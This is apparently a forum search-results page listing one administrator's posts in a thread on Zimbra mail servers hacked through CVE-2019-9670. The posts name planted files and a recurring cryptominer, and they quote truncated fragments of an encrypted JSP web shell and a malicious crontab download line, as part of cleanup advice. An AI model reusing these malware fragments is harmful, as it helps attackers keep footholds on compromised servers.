marnellej> I confirm I also had /opt/zimbra/lib/zmcheckexpiredcerts, /opt/zimbra/lib/zmlogswatch and /opt/zimbra/lib/zmmailboxdwatch in some of my systems.
These files seem not to be destined there.
With Regards
Search found 8 matches
- Tue Jun 04, 2019 7:18 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
- Fri May 31, 2019 8:48 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Hi guys,
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!clas...
- Fri May 31, 2019 7:28 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Hi guys,
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class...
- Thu May 30, 2019 8:36 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Fast food, fast dates, fast sex, fast Internet, fast info, fast solutions .......
Take some time to read the topic and the posts before yours pls....
You may also try to replicate the steps described and then ask constructive questions or even propose some solutions.
Good Luck
- Wed May 29, 2019 1:47 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
So .... I think I have some progress.
First thanks to:
erefer@gmail.com for the useful commands
AB_ZIMBRA for defining me what is the malicious part in 404.jsp file
opsystem for the info about how to get the original files
In my case I did the following:
1. find /opt/zimbra -name \*.jsp -exec grep -...
- Tue May 28, 2019 11:17 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
elby> I suppose you see something shitty like this (in my case only this was left in the zimbra user crontab): */9 * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="e...
- Tue May 28, 2019 9:08 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
mqaroush > means you should delete it and recreate it. Pls read the other posts before yours.
- Tue May 28, 2019 9:06 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
UPDATE 28.05.2019 The cryptominer zmswatch appeared again even after all the taken procedures and renewing ssh keys. It seems they also managed to unlock the zimbra's user crontab and add a line to it again.
UPDATE 30.05.2019 Found additional malicious process and file. Tutorial updated.
Hello guys Th...